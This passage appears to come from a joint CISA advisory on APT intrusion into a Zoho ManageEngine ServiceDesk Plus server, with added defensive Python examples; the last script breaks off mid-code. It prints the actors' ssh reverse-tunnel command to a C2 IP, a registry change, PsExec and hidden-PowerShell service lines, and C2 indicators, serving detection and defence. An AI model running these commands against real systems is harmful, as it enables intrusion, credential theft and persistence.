LSASS dumped by Azure user.

The Azure user successfully accessed and dumped credentials stored in the process memory of LSASS for the Active Directory (AD) domain [T1003.001].

Note: Adversaries may create a local account to maintain access to victim systems. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service. Such accounts may be used to establish secondary credentialed access that does not require persistent remote access tools to be deployed on the system.

2023-01-21 06:50:59

Mimikatz.exe downloaded via ConnectWise ScreenConnect.

The legitimate ConnectWise ScreenConnect client was utilized to connect to the ServiceDesk system, download mimikatz.exe, and execute malicious payloads to steal credentials [T1219], [T1588.002].

Note: ConnectWise ScreenConnect was observed in multiple locations within the organization’s environment, but the organization confirmed that it was not authorized software. Analysis assessed APT actors downloaded the legitimate software for malicious, illegitimate use prior to the download of mimikatz.exe.

2023-01-21 07:34:32

Bitmap.exe malware downloaded and configured to connect to C2 IP 179.60.147[.]4.

Azure user account downloaded bitmap.exe to the ServiceDesk system to execute an obfuscated, embedded malicious payload from its C2 server [T1027.009]. This malware is identified as a variant of Metasploit (Meterpreter).

See MAR-10430311-1.v1 for additional details.

2023-01-21 08:46:23

Mimikatz credential dump files created.

Two files (c:\windows\system32\fuu.txt, c:\windows\system32\jojo.txt) were created as a means for Mimikatz to dump/write credentials to disk on the ServiceDesk system [T1003].

2023-01-21 09:25:58

Legitimate files/applications nmap.exe and npcap.exe downloaded.

Azure user account downloaded nmap.exe [T1018] and npcap.exe [T1040] to continue network and credential information gathering efforts. Though legitimate applications, APT actors used these files for illegitimate, malicious purposes.

Note: Adversaries may gather information about the victim’s network topology that can be used during targeting. Information about network topologies may include a variety of details, including the physical and/or logical arrangement of both external-facing and internal network environments. This information may also include specifics regarding network devices (gateways, routers, etc.) and other infrastructure.

2023-01-21 13:56:14

ssh2.zip downloaded by the Azure user account.

APT actors downloaded the file ssh2.zip via the Azure user account, which contained legitimate files that could have been leveraged for malicious purposes. When unzipped, the following files were extracted:

  • install-sshd.ps1 (script)
  • psexec.exe
  • sshd.exe
  • ssh.exe
  • ssh-sk-helper.exe
  • libcrypto.dll

Note: CISA analyzed these files and did not identify the files as malicious. However, ssh.exe was downloaded to establish persistence on the ServiceDesk system via SSH [T1133] and is detailed in the scheduled task below.

2023-01-21 14:02:45

Ngrok token created, renamed to ngrok.yml config file, and Remote Desktop Protocol (RDP) connection established.

Ngrok was used to establish an RDP connection [T1021.001]—another method of maintaining persistence on the ServiceDesk system. In this instance, Ngrok was used to establish a reverse proxy connection to the ServiceDesk system.

At the time of analysis, the firewall access control lists (ACLs) allowed all outbound connections. Because the APT actors used an outbound proxy and the connection was initiated from the ServiceDesk system, the RDP session was established successfully.

Note: RDP is a common feature in operating systems, which allows a user to log into an interactive session with a system desktop graphical user interface on a remote system.

2023-01-21 14:31:01

SSH tools downloaded to establish reverse (remote) communication.

Three identified executables, which provide a command line interface with the compromised system, were observed in the following file system locations:

  • c:\windows\system32\ssh-shellhost.exe
  • c:\windows\system32\ssh-agent.exe
  • c:\windows\system32\ssh-add.exe

While the files were not identified as malicious, they were loaded for malicious purposes.

2023-01-21 14:33:11

license validf scheduled task created to communicate with malicious IP 104.238.234[.]145.

license validf scheduled task [T1036.004] was created to execute ssh.exe on a recurring basis on the ServiceDesk system [T1053.005]:

c:\Windows\System32\ssh.exe -N -f -R 12100 sst@104.238.234.145 -p 443 -o StrictHostKeyChecking=no

Analysis identified ssh.exe was used to establish an SSH reverse tunnel to the APT actors’ C2 with dynamic port forwarding [T1572]. This allowed the actors to send traffic from their C2 server into the environment and connect directly to other systems and resources.

2023-01-21 14:51:49

PsExec executed on the ServiceDesk system.

Analysis identified evidence and execution of two files (PsExec.exe and psexec.exe) on the ServiceDesk system. These files were determined to be benign.

APT actors utilized PsExec to create a scheduled task and force-store administrative credentials to the local machine.

psexec.exe -i -s C:\Windows\System32\mmc.exe /s C:\Windows\System32\taskschd.msc

powershell New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name "DisableRestrictedAdmin" -Value "0" -PropertyType DWORD -Force

Note: PsExec, a command line utility from Microsoft’s Sysinternals Suite, is known to be used for lateral movement; evidence of lateral movement via PsExec has not been confirmed.

2023-01-21 14:55:02

ProcDump created on the ServiceDesk system.

ProcDump was written to disk as c:\windows\system32\prc64.exe. This file was later identified as a method for enumerating running processes/applications [T1057] and dumping LSASS credentials.

2023-01-24 15:07:18

Apache Log4j exploit attempted against the ServiceDesk system.

APT actors attempted to exploit a known Apache Log4j vulnerability (CVE-2021-44228) in the ServiceDesk system but were unsuccessful. The two IPs and one domain associated with this exploitation attempt are:

  • 80.85.241[.]15
  • 68.177.56[.]38
  • main.cloudfronts[.]net

2023-01-25 00:17:33

Mimikatz credential dump files created.

One file (c:\ManageEngine\ServiceDesk\bin\1.txt) was created as a method for Mimikatz to dump/write credentials to disk on the ServiceDesk system.

Note: This is a different path and time associated with Mimikatz than listed above.

2023-01-29

HTTP-GET requests sent to C2 IP 92.118.39[.]82.

The server hosting ServiceDesk was observed beaconing/sending HTTP-GET requests to a suspected APT-controlled C2 server, indicating malware was successfully implanted.

2023-02-02 05:51:08

Resource.aspx web shell detected.

Using additionally compromised, legitimate administrative credentials, APT actors logged into the Outlook Web Application (OWA) server from the ServiceDesk system. The actors dropped an Active Server Pages Extended (ASPX) web shell in the following file system location, which was designed to execute remote JavaScript code [T1059.007] on the OWA server [T1505.003]:

  • c:\Program Files\Microsoft Office Web Apps\RootWebSite\en-us\resource.aspx

Note: The administrative user’s credentials were obtained from the APT actors’ collection (LSASS dump) of credentials from the entire AD domain. This user is separate from the actor-created Azure user account.

See MAR-10430311-1.v1 for additional details.

2023-02-02 18:45:58

Metasploit service installed.

APT actors installed Metasploit with the following attributes on the organization’s domain controller [T1059.001]:

  • Service Name: QrrCvbrvnxasKTSb [T1543.003]
  • Service File Name: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4) [T1564.003]

Note: Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform several actions, including discovery of information and execution of code.

2023-02-03 03:27:59

ConfigLogin.aspx web shell detected.

APT actors dropped an additional ASPX web shell on a web server in the following file system location:

  • c:\inetpub\wwwrot\uninet\css\font-awesome\css\ConfigLogin.aspx

See MAR-10430311-1.v1 for additional details.

2023-02-03 15:12:23

wkHPd.exe created to communicate with malicious IP 108.62.118[.]160.

APT actors created and used a variant of Metasploit (Meterpreter) on the ServiceDesk system, listed as wkHPd.exe [T1587.001]. This variant serves as an attack payload that runs an interactive shell and allows a malicious actor to control and execute code on a system.

See MAR-10430311-1.v1 for additional details.

2023-02-08 08:56:35, 2023-02-09 20:19:59, 2023-03-04, and 2023-03-18

Hypertext Preprocessor (PHP) files uploaded via HTTP-POST request from malicious IP 193.142.146[.]226.

PHP files were uploaded to the ServiceDesk system via HTTP-POST request. APT actors were observed writing 16 instances of the following files to disk:

  • [REDACTED]/wp-content/themes/seotheme/db.php (12 instances)
  • [REDACTED]/wp-content/plugins/ioptimization/IOptimize.php (4 instances)

2023-03-06 06:49:40

Interact.sh

APT actors executed Domain Name System (DNS) scanning at an additional server (not the ServiceDesk system) and directed callback to the Interact.sh domain, which indicated the server was susceptible to a DNS-style attack [T1046].

Destination IP: 103.105.49[.]108

Post-engagement analysis was extended but analysts were unable to determine additional actions taken by the APT actors, likely due to a lack of sensor coverage and data unavailability. With the data available, it was determined APT actors used the tools listed in Table 2 during their operations.
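The renamed LSASS dump files in Table 1 (wo_view_bg.zip, wo_view_bg1.gif, wo_view_bg2.gif) illustrate a check worth adding to egress inspection or file-integrity monitoring: compare a file’s leading bytes with what its extension promises. The following added example (not code from the advisory or from CISA) does exactly that for the minidump, ZIP and GIF signatures. The byte strings are constructed; the three dump names are reused from Table 1 only as labels, and logo.gif is an invented benign control.

```python
# Leading-byte signatures for the formats involved. A Windows minidump, which is
# what LSASS dumping tools such as ProcDump write, starts with the ASCII bytes "MDMP".
SIGNATURES = {
    "minidump": (b"MDMP",),
    "zip": (b"PK\x03\x04", b"PK\x05\x06"),   # local file header, or an empty archive
    "gif": (b"GIF87a", b"GIF89a"),
}

# Which content type each extension is supposed to carry. Extensions not listed
# here carry no expectation and are never reported as a mismatch.
EXPECTED_BY_EXT = {".zip": "zip", ".gif": "gif", ".dmp": "minidump"}


def sniff(data: bytes) -> str:
    """Classify content by its magic bytes; 'unknown' when nothing matches."""
    for kind, magics in SIGNATURES.items():
        if any(data.startswith(m) for m in magics):
            return kind
    return "unknown"


def extension_of(name: str) -> str:
    dot = name.rfind(".")
    return name[dot:].lower() if dot != -1 else ""


def check_file(name: str, data: bytes) -> dict:
    """Return a finding for one file: the sniffed type, the type the extension
    implies, whether they disagree, and whether the content is a minidump that
    is not honestly named .dmp (the masquerade seen in Table 1)."""
    actual = sniff(data)
    ext = extension_of(name)
    expected = EXPECTED_BY_EXT.get(ext)
    return {
        "name": name,
        "actual": actual,
        "expected": expected,
        "mismatch": expected is not None and actual != expected,
        "lsass_like": actual == "minidump" and ext != ".dmp",
    }


# Constructed sample contents (assumption: invented bytes; only the first few
# bytes matter to the check, the rest is padding).
SAMPLES = {
    "wo_view_bg.zip": b"MDMP\x93\xa7\x00\x00" + b"\x00" * 24,
    "wo_view_bg1.gif": b"MDMP\x93\xa7\x00\x00" + b"\x00" * 24,
    "wo_view_bg2.gif": b"MDMP\x93\xa7\x00\x00" + b"\x00" * 24,
    "logo.gif": b"GIF89a\x01\x00\x01\x00" + b"\x00" * 22,          # a real image
    "report.zip": b"PK\x03\x04\x14\x00" + b"\x00" * 26,            # a real archive
    "notes.txt": b"plain text, no expectation attached to .txt",
}


def scan(samples=SAMPLES):
    return [check_file(n, d) for n, d in samples.items()]


def suspicious(samples=SAMPLES):
    """Names of files whose content contradicts their extension or that carry a
    minidump under any extension other than .dmp."""
    return [f["name"] for f in scan(samples) if f["lsass_like"] or f["mismatch"]]


if __name__ == "__main__":
    for finding in scan():
        print(finding)
```

The check is cheap because only the first few bytes are read, so it can run on every outbound transfer; the minidump rule is kept separate from the generic mismatch rule so that a dump with a made-up extension that has no entry in EXPECTED_BY_EXT (for example .tmp) is still reported.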

Table 2: Observed Tools Used by APT Actors

Tool

Description

Observation

Mimikatz [2]

A credential dumping tool capable of obtaining plaintext Windows account logins and passwords, along with many other features that make it useful for testing the security of networks.

In addition to using Mimikatz for credential dumping, APT actors dumped the following Windows Registry hive files (named in Tables 9 and 10):

  • sam.hiv
  • system.hiv
  • security.hiv

These files were dumped to obtain registry information such as users on the system, data used by the operating system [T1012], and installed programs.

Ngrok [3]

Ngrok software operates by running a client process on the machine and creating a private connection tunnel to a designated open port. Ngrok delivers instant ingress to applications in any cloud, private network, or devices with authentication, load balancing, and other critical controls.

In recent years, Ngrok has been leveraged maliciously by a variety of threat actors, including use for persistence, lateral movement, and data exfiltration.[4],[5],[6]

Using Ngrok as an external service, APT actors were able to gain access to and utilize the command line on victim systems.

Note: CISA and co-sealers have observed this commonly used commercial platform being abused by malicious actors to bypass typical firewall controls. Ngrok’s ability to tunnel RDP and other services securely over internet connections makes it a target for abuse by malicious actors.

ProcDump

A command-line application used to monitor processes and create crash dump files. A crash dump file contains the data loaded in memory at the time the dump was triggered. It is typically used for troubleshooting errors with an application or operating system.

APT actors used ProcDump to conduct reconnaissance and examine spawned processes (applications in use). This tool was also utilized as a utility for dumping credentials from the server hosting ServiceDesk Plus.

Metasploit

Metasploit is an open-source penetration testing software.

APT actors’ specific use of Meterpreter—an attack payload of Metasploit—serves as an interactive shell and allows threat actors to control and execute code on a system.

Interact.sh

An open-source tool for detecting external interactions (communication).[7] This tool is used to detect callbacks from target systems for specified vulnerabilities and commonly used during the reconnaissance stages of adversary activity.

APT actors likely used Interact.sh to refrain from using and disclosing their own C2 infrastructure.

anydesk.exe

A remote desktop application that provides platform-independent remote access to personal computers and other devices running the host application. It offers remote control, file transfer, and VPN functionality.

Between early-February and mid-March 2023, anydesk.exe was observed on three hosts with different certificate issuers and hashes—none of which were the certified issuer [T1553.002]. APT actors compromised one host and moved laterally to install the executable on the remaining two [T1570]—listed in order of time, as follows:

  • c:\programdata\anydesk.exe
  • c:\Users\[REDACTED]\Downloads\AnyDesk.exe
  • c:\Users\[REDACTED]\Documents\personal\program\AnyDesk.exe

Note: Analysts confirmed APT actors’ weaponized use of anydesk.exe but were unable to confirm how the software was installed on each host.

quser.exe

A valid program on Windows machines that displays information about user sessions on a Remote Desktop Session Host server [T1049], including the name of the user, name of the session on the remote desktop session host server, session ID, state of the session (active or disconnected), idle time (number of minutes since last keystroke or mouse movement), and date/time the user logged on.[8]

APT actors were observed using this tool as early as March 2023 across four locations with the same name but different hashes (one of which is associated with the Portuguese [Brazil] language pack):

c:\ProgramFiles\WindowsApps\Microsoft.LanguageExperiencePackpt-BR_19041.56.186.0_neutral__8wekyb3d8bbwe\Windows\System32\pt-BR

xpack.exe

A custom .NET loader that decrypts (AES), loads, and executes accompanying files.

Xpack.exe indicators were present on multiple organization hosts, with an unverified user account observed navigating to the sites: xpack.github[.]io and xpack.disqus[.]com. Additionally, one administrator account and multiple user accounts were observed executing the xpack.exe file from a hidden directory [T1564.001]:

c:\USERS\[REDACTED]\.P2\POOL\PLUGINS\ORG.ECLIPSE.EMBEDCDT.TEMPLATES.XPACK_6.3.1.202210101738

This malware was predominantly used to execute system commands, drop additional malware and tools, and stage data for exfiltration [T1074]. Note: The data exfiltrated is unknown.

MITRE ATT&CK TACTICS AND TECHNIQUES

See Tables 3-13 for all referenced APT actors’ tactics and techniques for enterprise environments in this advisory. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.

Table 3: Resource Development

Technique Title

ID

Use

Acquire Infrastructure: Botnet

T1583.005

Actors used User-Agent string Hello World as an initial step of the Mirai botnet to later download malicious artifacts.

Develop Capabilities: Malware

T1587.001

Actors created and used a variant of Metasploit (Meterpreter) on the ServiceDesk system, listed as wkHPd.exe. This malware serves as an attack payload that runs an interactive shell; it allows for control and code execution on a system.

Obtain Capabilities: Exploits

T1588.002

Actors leveraged the legitimate ConnectWise ScreenConnect client to download and utilize the credential dumping tool, mimikatz.exe.

Table 4: Initial Access

Technique Title

ID

Use

Exploit Public-Facing Application

T1190

Actors exploited a known vulnerability (CVE-2022-47966) in the organization’s web server hosting Zoho ManageEngine ServiceDesk Plus.

Actors also attempted to exploit a known Apache Log4j vulnerability (CVE-2021-44228) in the ServiceDesk system but were unsuccessful.

Table 5: Execution

Technique Title

ID

Use

Command and Scripting Interpreter: PowerShell

T1059.001

Actors installed and used Metasploit via PowerShell on the organization’s domain controller.

Command and Scripting Interpreter: JavaScript

T1059.007

Actors dropped an ASPX web shell on the OWA server, which was designed to execute remote JavaScript code.

Table 6: Persistence

Technique Title

ID

Use

Scheduled Task/Job: Scheduled Task

T1053.005

Actors created the scheduled task license validf to execute ssh.exe on a recurring basis. This executable was observed as means of establishing persistence on the ServiceDesk system.

Valid Accounts: Local Accounts

T1078.003

Actors compromised and utilized account credentials from a previously hired contractor, of which the contract ended prior to the timeframe of observed activity.

External Remote Services

T1133

ssh.exe executes on a recurring basis via a scheduled task on the ServiceDesk system as a method for access via SSH.

Create Account: Local Account

T1136.001

Actors created a local account with administrative permissions on the server hosting ServiceDesk Plus.

Server Software Component: Web Shell

T1505.003

Actors logged into the OWA server from the ServiceDesk system and dropped an ASPX web shell to establish persistent access and execute remote code.

Create or Modify System Process: Windows Service

T1543.003

Actors created a Windows Service via Metasploit.

Table 7: Privilege Escalation

Technique Title

ID

Use

Exploitation for Privilege Escalation

T1068

Through exploitation of CVE-2022-47966, actors were given root level access on the web server and created a local user account named Azure with administrative privileges.

Table 8: Defense Evasion

Technique Title

ID

Use

Indicator Removal: Clear Windows Event Logs

T1070.001

Actors compromised and used disabled, legitimate administrative account credentials to delete logs from several critical servers in the environment.

Masquerading: Masquerade Task or Service

T1036.004

Actors created a scheduled task license validf, which appears as legitimate/benign and executes ssh.exe on a recurring basis on the ServiceDesk system.

Masquerading: Masquerade File Type

T1036.008

Actors attempted to export three files, which were analyzed and identified as LSASS dump files. These files were renamed with .zip and .gif extensions to evade detection.

Obfuscated Files or Information: Embedded Payloads

T1027.009

Actors downloaded the malware bitmap.exe on the ServiceDesk system to execute an obfuscated, embedded malicious payload from its C2 server.

Subvert Trust Controls: Code Signing

T1553.002

Anydesk.exe was observed on three hosts with different certificate issuers and hashes—none of which were the certified issuer.

Hide Artifacts: Hidden Files and Directories

T1564.001

Actors used xpack.exe as a method for decrypting, loading, and executing accompanying files from a hidden directory.

Hide Artifacts: Hidden Window

T1564.003

Actors used -w hidden to conceal PowerShell windows by setting the WindowStyle parameter to hidden.

Table 9: Credential Access

Technique Title

ID

Use

OS Credential Dumping

T1003

Actors created three files as a means for Mimikatz to dump/write credentials to disk on the ServiceDesk system.

OS Credential Dumping: LSASS Memory

T1003.001

Actors successfully accessed and dumped credentials stored in the process memory of LSASS for the AD domain, including with the use of ProcDump.

OS Credential Dumping: Security Account Manager

T1003.002

Actors dumped sam.hiv to obtain information about users on the system.

Table 10: Discovery

Technique Title

ID

Use

System Network Connections Discovery

T1049

Quser.exe was executed to acquire information about user sessions on a Remote Desktop Session Host server.

Query Registry

T1012

Actors dumped system.hiv and security.hiv to obtain information about the data used by the operating system.

Remote System Discovery

T1018

Actors downloaded the legitimate file/application nmap.exe via the Azure user to conduct network information gathering efforts.

Network Sniffing

T1040

Actors downloaded the legitimate file/application npcap.exe via the Azure user to conduct credential gathering efforts.

Network Service Discovery

T1046

Actors executed DNS scanning at a web server and directed callback to the Interact.sh domain, which indicated the server was susceptible to a DNS-style attack.

Process Discovery

T1057

ProcDump was written to disk as c:\windows\system32\prc64.exe and used as a method for enumerating running processes/applications.

Table 11: Lateral Movement

Technique Title

ID

Use

Remote Services: Remote Desktop Protocol

T1021.001

Ngrok was used to establish an RDP connection with the ServiceDesk system.

Lateral Tool Transfer

T1570

Actors compromised one host and moved laterally to install anydesk.exe on two additional hosts.

Table 12: Collection

Technique Title

ID

Use

Data Staged

T1074

Actors executed xpack.exe malware from a hidden directory. This malware was predominantly used to execute system commands, drop additional malware and tools, and stage data for exfiltration.

Table 13: Command and Control

Technique Title

ID

Use

Application Layer Protocol: Web Protocols

T1071.001

Hello World User-Agent string was identified in an HTTP request. Communication occurred between the organization’s web server and an actor-controlled C2 IP address.

Remote Access Software

T1219

Actors leveraged ConnectWise ScreenConnect to connect to the ServiceDesk system.

Anydesk.exe was run on at least three different hosts in the environment.

Non-Standard Port

T1571

Actors initiated multiple TLS-encrypted sessions on non-standard TCP port 10443.

Protocol Tunneling

T1572

Actors were observed leveraging SSH to build a reverse tunnel with their C2 server to dynamically forward traffic into the victim organization’s environment.

Using Ngrok as an external service, actors were also able to gain access to and use the command line on victim systems via RDP.

Encrypted Channel: Asymmetric Cryptography

T1573.002

Actors initiated multiple TLS-encrypted sessions on TCP port 10443, indicating successful exchanges of data transfer from the firewall device.

DETECTION METHODS

CISA and co-sealers recommend reviewing Tables 3-13: Identified ATT&CK Techniques for Enterprise in conjunction with the detections in this section to identify similar activity.

  • Enable logging for new user creation [DS0002], as well as monitor executed commands and arguments for actions that are associated with local account creation, such as net user /add, useradd, and dscl -create [DS0017].
  • Monitor for newly constructed scheduled tasks by enabling the “Microsoft-Windows-TaskScheduler/Operational” setting within the event logging service. Monitor for changes made to scheduled tasks that may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools [DS0003].
  • Monitor for API calls that may create or modify Windows services (ex: CreateServiceW()) to repeatedly execute malicious payloads as part of persistence [DS0009].
  • Monitor executed commands and arguments that may attempt to access credential material stored in the process memory of the LSASS [DS0017].
  • Monitor for user accounts logged into systems associated with RDP (ex: Windows EID 4624 Logon Type 10) [DS0028].
  • Monitor for newly-constructed network connections associated with pings/scans that may attempt to collect a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for lateral movement from the current system [DS0029].
  • Conduct full port scans (1-65535) on internet-facing systems—not just a subset of the ports.
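The bullets above name the data sources to monitor; the following added example (not the advisory’s own tooling, and not CISA’s) shows the corresponding detection logic as small rules over a few constructed, already-parsed Windows events: account creation (Security 4720), a scheduled task that launches ssh.exe with remote port forwarding (Security 4698, mirroring the license validf task in Table 1), an RDP logon (Security 4624, Logon Type 10), and a service whose image path starts hidden PowerShell (System 7045, mirroring the Metasploit service in Table 1). The simplified field names, the host names, the backupsvc and jdoe accounts, and the 203.0.113.45 address are assumptions; in practice the events would come from a SIEM or Get-WinEvent export.

```python
import ntpath

# Constructed, already-parsed Windows events (assumption: the field names are a
# simplification of the Security/System channel schemas; hosts, users and IPs
# are invented except where they echo the advisory's own timeline).
EVENTS = [
    {"channel": "Security", "id": 4720, "host": "SD-PLUS01", "subject": "SVC-ADMIN",
     "target_user": "Azure"},
    {"channel": "Security", "id": 4698, "host": "SD-PLUS01", "subject": "Azure",
     "task_name": "\\license validf",
     "command": "c:\\Windows\\System32\\ssh.exe",
     "arguments": "-N -f -R 12100 sst@203.0.113.45 -p 443 -o StrictHostKeyChecking=no"},
    {"channel": "Security", "id": 4624, "host": "SD-PLUS01", "subject": "Azure",
     "logon_type": 10, "source_ip": "127.0.0.1"},
    {"channel": "System", "id": 7045, "host": "DC01", "subject": "SYSTEM",
     "service_name": "QrrCvbrvnxasKTSb",
     "image_path": "%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -noni -c [TRUNCATED]"},
    # Benign noise the rules must ignore.
    {"channel": "Security", "id": 4698, "host": "FILE01", "subject": "backupsvc",
     "task_name": "\\Nightly Backup",
     "command": "C:\\Program Files\\Backup\\run.exe", "arguments": "--full"},
    {"channel": "Security", "id": 4624, "host": "FILE01", "subject": "jdoe",
     "logon_type": 3, "source_ip": "10.0.0.12"},
]


def _basename(path: str) -> str:
    return ntpath.basename(path).lower()


def rule_account_created(ev):
    """Security 4720: a user account was created. Always worth a ticket on servers."""
    if ev["id"] == 4720:
        return f"local account {ev.get('target_user')!r} created by {ev.get('subject')}"
    return None


def rule_ssh_reverse_tunnel(ev):
    """Security 4698: a scheduled task was created whose action is ssh with -R,
    i.e. a remote port forward that lets the far end reach into the network."""
    if ev["id"] == 4698 and _basename(ev.get("command", "")) in {"ssh.exe", "ssh"}:
        args = ev.get("arguments", "").split()
        if any(a == "-R" or a.startswith("-R") for a in args):
            return (f"task {ev.get('task_name')!r} runs ssh with remote port "
                    f"forwarding ({ev.get('arguments')})")
    return None


def rule_rdp_logon(ev):
    """Security 4624 with Logon Type 10 (RemoteInteractive): an RDP session."""
    if ev["id"] == 4624 and ev.get("logon_type") == 10:
        return f"RDP logon by {ev.get('subject')} from {ev.get('source_ip')}"
    return None


HIDDEN_PS_FLAGS = ("-w hidden", "-windowstyle hidden", "-nop", "-noni")


def rule_hidden_powershell_service(ev):
    """System 7045: a service was installed whose image path launches PowerShell
    with flags that hide the window or skip profile/interaction."""
    if ev["id"] == 7045:
        path = ev.get("image_path", "").lower()
        if "powershell" in path and any(flag in path for flag in HIDDEN_PS_FLAGS):
            return f"service {ev.get('service_name')!r} launches hidden PowerShell"
    return None


RULES = [rule_account_created, rule_ssh_reverse_tunnel,
         rule_rdp_logon, rule_hidden_powershell_service]


def detect(events=EVENTS):
    """Apply every rule to every event; return (event_index, rule_name, host, message)."""
    findings = []
    for idx, ev in enumerate(events):
        for rule in RULES:
            message = rule(ev)
            if message:
                findings.append((idx, rule.__name__, ev["host"], message))
    return findings


if __name__ == "__main__":
    for idx, rule_name, host, message in detect():
        print(f"[{host}] {rule_name}: {message}")
```

Two of these rules (account creation and RDP logon) fire on legitimate administration too; their value comes from correlation, as in Table 1, where the account creation, the ssh task and the RDP session all land on the same host within a few hours. Building the rules as plain functions returning a message or None keeps them easy to port into whatever query language the organization’s SIEM uses.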

MITIGATIONS

Note: These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.

Manage Vulnerabilities and Configurations [CPG 1.E, CPG 3.A]

CISA and co-sealers identified that exploitation of CVE-2022-47966 granted initial access to the public-facing application, Zoho ManageEngine ServiceDesk Plus. Multiple Zoho ManageEngine on-premises products, such as ServiceDesk Plus through 14003, allow remote code execution due to use of version 1.4.1 of Apache XML Security for Java (also known as xmlsec) from the Apache Santuario project. Because XSLT features are enabled by design in that version of xmlsec, the application itself is responsible for certain security protections. CISA and co-sealers recommend the following:

  • Document device configurations [CPG 2.O]. Organizations should maintain updated documentation describing the current configuration details of all critical IT assets (and OT, where applicable), as this facilitates more effective vulnerability and response activities.
  • Keep all software up to date and patch systems for known exploited vulnerabilities. Where a known exploited vulnerability affects an endpoint device (e.g., a firewall security appliance), investigate for compromise before patching [CPG 1.E].
  • Follow a routine patching cycle [M1051] for all operating systems, applications, and software (including all third-party software) to mitigate the potential for exploitation.
  • Prioritize remediation of vulnerabilities on internet-facing systems, for example, by conducting continuous automated and/or routine vulnerability scans [M1016]. CISA offers a range of services at no cost, including scanning and testing to help organizations reduce exposure to threats via mitigating attack vectors. Specifically, Cyber Hygiene services can help provide a second set of eyes on organizations’ internet-accessible assets. Organizations can email vulnerability@cisa.dhs.gov with the subject line, “Requesting Cyber Hygiene Services” to get started. For additional guidance on remediating these vulnerabilities, see CISA Insights – Remediate Vulnerabilities for Internet-Accessible Systems.
  • Deploy security.txt files [CPG 4.C]. Ensure all public-facing web domains have a security.txt file that conforms to the recommendations in RFC 9116.[9]
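To check the security.txt recommendation above, here is an added example (not from the advisory) in Python that validates a security.txt body against the mandatory RFC 9116 fields: at least one Contact that is a URI, exactly one Expires in RFC 3339 form with a time zone offset, not already past and not more than a year out. The file body and the example.com host are constructed placeholders; the optional now_iso parameter pins "now" so results are repeatable.

```python
from datetime import datetime, timedelta, timezone
from typing import Dict, List

# Constructed example of a security.txt body (placeholder host, not a real domain).
SAMPLE_SECURITY_TXT = """\
# Served at https://example.com/.well-known/security.txt
Contact: mailto:security@example.com
Contact: https://example.com/report
Expires: 2024-03-01T00:00:00.000Z
"""
URI_SCHEMES = ("mailto:", "tel:", "https://", "http://")

def parse_security_txt(body: str) -> Dict[str, List[str]]:
    """Map lowercased field names to their values; '#' lines and blanks are skipped."""
    fields: Dict[str, List[str]] = {}
    for raw in body.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or ":" not in line:
            continue
        name, value = line.split(":", 1)
        fields.setdefault(name.strip().lower(), []).append(value.strip())
    return fields

def validate_security_txt(body: str, now_iso: str = "") -> List[str]:
    """Return RFC 9116 problems; empty list means it passes. now_iso pins 'now'."""
    now = datetime.fromisoformat(now_iso) if now_iso else datetime.now(timezone.utc)
    f = parse_security_txt(body)
    problems: List[str] = []
    contacts = f.get("contact", [])          # mandatory, one or more URIs
    if not contacts:
        problems.append("missing required Contact field")
    for c in contacts:
        if not c.lower().startswith(URI_SCHEMES):
            problems.append(f"Contact is not a URI: {c!r}")
    expires = f.get("expires", [])           # mandatory, exactly once
    if len(expires) != 1:
        problems.append("Expires must appear exactly once")
    else:
        try:
            exp = datetime.fromisoformat(expires[0].replace("Z", "+00:00"))
        except ValueError:
            problems.append(f"Expires is not an RFC 3339 date-time: {expires[0]!r}")
        else:
            if exp.tzinfo is None:
                problems.append("Expires lacks a time zone offset")
            elif exp <= now:
                problems.append("security.txt has expired")
            elif exp - now > timedelta(days=365):
                problems.append("Expires is more than a year in the future")
    return problems
```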

Segment Networks [CPG 2.F]

CISA and co-sealers identified that the organization did not employ proper network segmentation, such as a demilitarized zone (DMZ), during the initial discovery phase of the incident response. A DMZ serves as a perimeter network that protects and adds an extra layer of security to an organization’s internal local area network (LAN) from untrusted traffic.

  • Employ proper network segmentation, such as a DMZ, and address the following recommendations. Note: The end goal of a DMZ network is to allow an organization to access untrusted networks, such as the internet, while ensuring its private network or LAN remains secure. Organizations typically store external-facing services and resources, as well as servers for DNS, File Transfer Protocol (FTP), mail, proxy, Voice over Internet Protocol (VoIP), and web servers in the DMZ [CPG 2.K, CPG 2.W].
    • Limit internet-facing port exposure for critical resources in the DMZ networks.
    • Limit exposed ports to only required IP addresses and avoid placing wildcards in destination port or host entries.
    • Ensure unsecured protocols like FTP and HTTP are limited in use and restricted to specific IP ranges.
    • If data flows from an untrusted zone to a trusted zone, ensure it is conducted over a secure protocol like HTTPS with mandatory multi-factor authentication.
  • Use a firewall or web-application firewall (WAF) and enable logging to prevent/detect potential exploitation attempts [M1050]. Review ingress and egress firewall rules and block all unapproved protocols. Limit risky (but approved) protocols through rules.
    • Use WAF to limit exposure to just approved ports, as well as monitor file changes in web directories.
  • Implement network segmentation to separate network segments based on role and functionality. Proper network segmentation significantly reduces the ability for threat actor lateral movement by controlling traffic flows between—and access to—various subnetworks. See CISA’s Layering Network Security Through Segmentation infographic and the National Security Agency’s (NSA’s) Segment Networks and Deploy Application-Aware Defenses.
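As an added example (not from the advisory), the Python script below audits a simplified firewall rule export against the DMZ guidance above: it flags wildcard destination hosts or ports, FTP/HTTP exposed to any source rather than a specific IP range, and flows into the trusted LAN that do not use HTTPS. The address plan (192.0.2.0/24 as DMZ, 10.10.0.0/16 as LAN), the rule tuple format and the rules themselves are constructed for illustration.

```python
import ipaddress
from typing import List, Tuple

# Constructed address plan (not a real network): a DMZ segment and the internal LAN.
DMZ = ipaddress.ip_network("192.0.2.0/24")
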